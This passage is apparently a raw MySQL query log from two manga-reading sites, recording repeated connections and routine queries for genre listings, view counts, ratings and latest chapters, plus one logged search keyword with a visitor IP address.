'%Romance%' OR genres like '%School%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330639135 Quit 330639139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639139 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '29' and m.active = 1 330639139 Quit 330639140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639140 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='29' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:28:01 330639141 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639142 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639141 Quit 330639142 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY (k.id * FLOOR(1 + RAND() * 100000)) % 100000 DESC limit 10 330639143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639143 Quit 330639144 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('グラぱらっ!', '218.103.245.11', '2026-02-26 03:28:01') 330639144 Quit 330639145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639145 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%グラぱらっ!%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%グラぱらっ!%' ) ) 330639145 Quit 330639146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639146 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'グラぱらっ!' 330639142 Quit 330639147 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639147 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 50 330639147 Quit 330639148 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639148 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330639146 Quit 330639149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639149 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330639148 Quit 330639150 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639151 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639150 Quit 330639151 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639151 Quit 330639152 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330639152 Quit 330639153 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330639153 Quit 330639154 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330639154 Quit 330639155 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330639155 Quit 330639156 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330639156 Quit 330639157 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330639157 Quit 330639158 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330639158 Quit 330639159 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330639159 Quit 330639160 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330639160 Quit 330639161 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330639161 Quit 330639162 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330639162 Quit 330639163 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639163 Query select * FROM chapters where manga_id = '262' order by created desc limit 1 330639163 Quit 330639164 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330639164 Quit 330639165 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639165 Query select * FROM chapters where manga_id = '237' order by created desc limit 1 330639165 Quit 330639166 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330639166 Quit 330639167 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639167 Query select * FROM chapters where manga_id = '257' order by created desc limit 1 330639167 Quit 330639168 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330639168 Quit 330639169 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639169 Query select * FROM chapters where manga_id = '216' order by created desc limit 1 330639169 Quit 330639170 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330639170 Quit 330639171 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639171 Query select * FROM chapters where manga_id = '275' order by created desc limit 1 330639171 Quit 330639172 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330639172 Quit 330639173 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639173 Query select * FROM chapters where manga_id = '292' order by created desc limit 1 330639173 Quit 330639174 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330639174 Quit 330639175 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639175 Query select * FROM chapters where manga_id = '270' order by created desc limit 1 330639175 Quit 330639176 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330639176 Quit 330639177 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639177 Query select * FROM chapters where manga_id = '24' order by created desc limit 1 330639177 Quit 330639178 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330639178 Quit 330639179 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639179 Query select * FROM chapters where manga_id = '169' order by created desc limit 1 330639179 Quit 330639180 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330639180 Quit 330639181 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639181 Query select * FROM chapters where manga_id = '172' order by created desc limit 1 330639181 Quit 330639182 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330639182 Quit 330639183 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639183 Query select * FROM chapters where manga_id = '230' order by created desc limit 1 330639183 Quit 330639184 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330639184 Quit 330639185 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639185 Query select * FROM chapters where manga_id = '267' order by created desc limit 1 330639185 Quit 330639186 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330639186 Quit 330639187 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639187 Query select * FROM chapters where manga_id = '271' order by created desc limit 1 330639187 Quit 330639188 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330639188 Quit 330639189 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639189 Query select * FROM chapters where manga_id = '277' order by created desc limit 1 330639189 Quit 330639190 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330639190 Quit 330639191 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639191 Query select * FROM chapters where manga_id = '300' order by created desc limit 1 330639191 Quit 330639192 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330639192 Quit 330639193 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639193 Query select * FROM chapters where manga_id = '304' order by created desc limit 1 330639193 Quit 330639194 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330639194 Quit 330639195 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639195 Query select * FROM chapters where manga_id = '303' order by created desc limit 1 330639195 Quit 330639196 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330639196 Quit 330639197 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639197 Query select * FROM chapters where manga_id = '296' order by created desc limit 1 330639197 Quit 330639198 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330639198 Quit 330639199 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639199 Query select * FROM chapters where manga_id = '281' order by created desc limit 1 330639199 Quit 330639200 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330639200 Quit 330639201 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639201 Query select * FROM chapters where manga_id = '291' order by created desc limit 1 330639201 Quit 330639202 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330639202 Quit 330639203 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639203 Query select * FROM chapters where manga_id = '285' order by created desc limit 1 330639203 Quit 330639204 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330639204 Quit 330639205 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639205 Query select * FROM chapters where manga_id = '251' order by created desc limit 1 330639205 Quit 330639206 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330639206 Quit 330639207 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639207 Query select * FROM chapters where manga_id = '246' order by created desc limit 1 330639207 Quit 330639208 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330639208 Quit 330639209 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639209 Query select * FROM chapters where manga_id = '241' order by created desc limit 1 330639209 Quit 330639210 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330639210 Quit 330639211 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639211 Query select * FROM chapters where manga_id = '222' order by created desc limit 1 330639211 Quit 330639212 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330639212 Quit 330639213 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639213 Query select * FROM chapters where manga_id = '221' order by created desc limit 1 330639213 Quit 330639214 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330639214 Quit 330639215 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639215 Query select * FROM chapters where manga_id = '211' order by created desc limit 1 330639215 Quit 330639216 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330639216 Quit 330639217 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639217 Query select * FROM chapters where manga_id = '210' order by created desc limit 1 330639217 Quit 330639218 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330639218 Quit 330639219 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639219 Query select * FROM chapters where manga_id = '202' order by created desc limit 1 330639219 Quit 330639220 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330639220 Quit 330639221 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639221 Query select * FROM chapters where manga_id = '181' order by created desc limit 1 330639221 Quit 330639222 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330639222 Quit 330639223 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639223 Query select * FROM chapters where manga_id = '162' order by created desc limit 1 330639223 Quit 330639224 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330639224 Quit 330639225 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639225 Query select * FROM chapters where manga_id = '161' order by created desc limit 1 330639225 Quit 330639226 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '159' order by created desc 330639226 Quit 330639227 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639227 Query select * FROM chapters where manga_id = '159' order by created desc limit 1 330639227 Quit 330639228 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330639229 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639228 Quit 330639229 Query select * FROM chapters where manga_id = '151' order by created desc limit 1 330639229 Quit 330639230 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330639230 Quit 330639231 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639231 Query select * FROM chapters where manga_id = '146' order by created desc limit 1 330639231 Quit 330639149 Quit 330639232 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330639233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639232 Quit 330639234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639235 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639233 Quit 330639235 Query select * FROM chapters where manga_id = '138' order by created desc limit 1 330639234 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330639235 Quit 330639234 Quit 330639236 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330639237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330639236 Quit 330639238 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639237 Quit 330639238 Query select * FROM chapters where manga_id = '135' order by created desc limit 1 330639239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330639238 Quit 330639239 Quit 330639241 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330639240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639241 Quit 330639240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330639240 Quit 330639242 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639242 Query select * FROM chapters where manga_id = '131' order by created desc limit 1 330639243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330639243 Quit 330639242 Quit 330639244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330639245 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639244 Quit 330639245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330639245 Quit 330639246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330639247 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639246 Quit 330639247 Query select * FROM chapters where manga_id = '119' order by created desc limit 1 330639247 Quit 330639248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639249 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330639249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330639248 Quit 330639249 Quit 330639250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639251 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330639251 Query select * FROM chapters where manga_id = '116' order by created desc limit 1 330639250 Quit 330639251 Quit 330639252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639253 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330639252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330639253 Quit 330639252 Quit 330639254 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639254 Query select * FROM chapters where manga_id = '132' order by created desc limit 1 330639255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330639255 Quit 330639256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639254 Quit 330639256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330639256 Quit 330639257 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330639257 Quit 330639258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330639258 Quit 330639259 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639259 Query select * FROM chapters where manga_id = '104' order by created desc limit 1 330639260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330639260 Quit 330639261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330639261 Quit 330639262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639259 Quit 330639262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330639262 Quit 330639263 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330639264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330639264 Quit 330639263 Quit 330639266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639265 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330639265 Query select * FROM chapters where manga_id = '26' order by created desc limit 1 330639266 Quit 330639267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330639267 Quit 330639265 Quit 330639268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639269 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330639269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330639268 Quit 330639269 Quit 330639270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639271 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330639271 Query select * FROM chapters where manga_id = '193' order by created desc limit 1 330639270 Quit 330639272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639271 Quit 330639272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330639272 Quit 330639273 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330639274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639273 Quit 330639274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330639274 Quit 330639275 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639275 Query select * FROM chapters where manga_id = '284' order by created desc limit 1 330639276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330639276 Quit 330639275 Quit 330639277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330639278 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330639277 Quit 330639278 Quit 330639279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330639279 Quit 330639281 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639281 Query select * FROM chapters where manga_id = '236' order by created desc limit 1 330639280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330639280 Quit 330639281 Quit 330639282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639283 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330639283 Quit 330639282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330639282 Quit 330639284 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639284 Query select * FROM chapters where manga_id = '256' order by created desc limit 1 330639285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639284 Quit 330639285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330639285 Quit 330639286 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330639286 Quit 330639287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330639288 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639287 Quit 330639288 Query select * FROM chapters where manga_id = '25' order by created desc limit 1 330639289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330639289 Quit 330639288 Quit 330639291 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330639290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330639291 Quit 330639290 Quit 330639292 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639292 Query select * FROM chapters where manga_id = '189' order by created desc limit 1 330639293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330639293 Quit 330639294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330639294 Quit 330639295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330639292 Quit 330639295 Quit 330639296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639297 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639296 Query select count(id) as total_rating, (sum(rating) / 